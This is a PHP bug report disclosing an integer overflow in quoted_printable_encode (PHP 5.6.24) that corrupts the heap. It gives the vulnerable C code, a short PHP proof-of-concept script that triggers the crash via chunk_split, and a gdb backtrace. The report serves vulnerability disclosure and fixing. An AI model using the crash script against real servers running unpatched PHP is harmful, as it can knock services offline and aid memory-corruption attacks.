integer overflow in quoted_printable_encode caused heap corruption
| Bug #72848 | integer overflow in quoted_printable_encode caused heap corruption | ||||
|---|---|---|---|---|---|
| Submitted: | 2016-08-16 07:38 UTC | Modified: | 2017-02-13 01:45 UTC | ||
| From: | minhrau dot vc dot 365 at gmail dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | *General Issues | ||
| PHP Version: | 5.6.24 | OS: | ALL | ||
| Private report: | No | CVE-ID: | None | ||
[2016-08-16 07:38 UTC] minhrau dot vc dot 365 at gmail dot com
Description:
------------
An integer overflow in function php_quot_print_encode, will lead to heap corruption. Please check the detail of this vuln in comment below:
PHPAPI unsigned char *php_quot_print_encode(const unsigned char *str, size_t length, size_t *ret_length) /* {{{ */
{
unsigned long lp = 0;
unsigned char c, *ret, *d;
char *hex = "0123456789ABCDEF";
ret = safe_emalloc(3, length + (((3 * length)/(PHP_QPRINT_MAXL-9)) + 1), 1); // the size of safe_emalloc is larger than INT_MAX
d = ret;
while (length--) {
Test script:
---------------
<?php
ini_set('memory_limit', -1);
$str = str_repeat('รด', 0xffffffff/4);
var_dump(strlen($str));
$str1 = quoted_printable_encode($str);
unset($str);
var_dump(strlen($str1));
chunk_split($str1, 11, $str1);
?>
Expected result:
----------------
No Crash
Actual result:
--------------
Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testquoted_printable_encode_negative.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
int(2147483646)
int(-1879048199)
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff1d92f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6
(gdb) bt
#0 0x00007ffff1d92f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6
#1 0x00000000006b053f in zif_chunk_split (ht=<optimized out>, return_value=0x7ffff7fa2fc8, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/standard/string.c:2221
#2 0x00000000007f908d in zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558
#3 0x0000000000783b4e in execute_ex (execute_data=0x7ffff7f6f248) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363
#4 0x000000000074ed41 in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341
#5 0x00000000006ed0d0 in php_execute_script (primary_file=primary_file@entry=0x7fffffffd0d0) at /home/minhrau/PHP-5.6.24/main/main.c:2613
#6 0x00000000007faa97 in do_cli (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994
#7 0x00000000004361e4 in main (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378
(gdb)
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2016-08-16 22:50 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-08-17 05:57 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2017-02-13 01:45 UTC] stas@php.net
-Type: Security +Type: Bug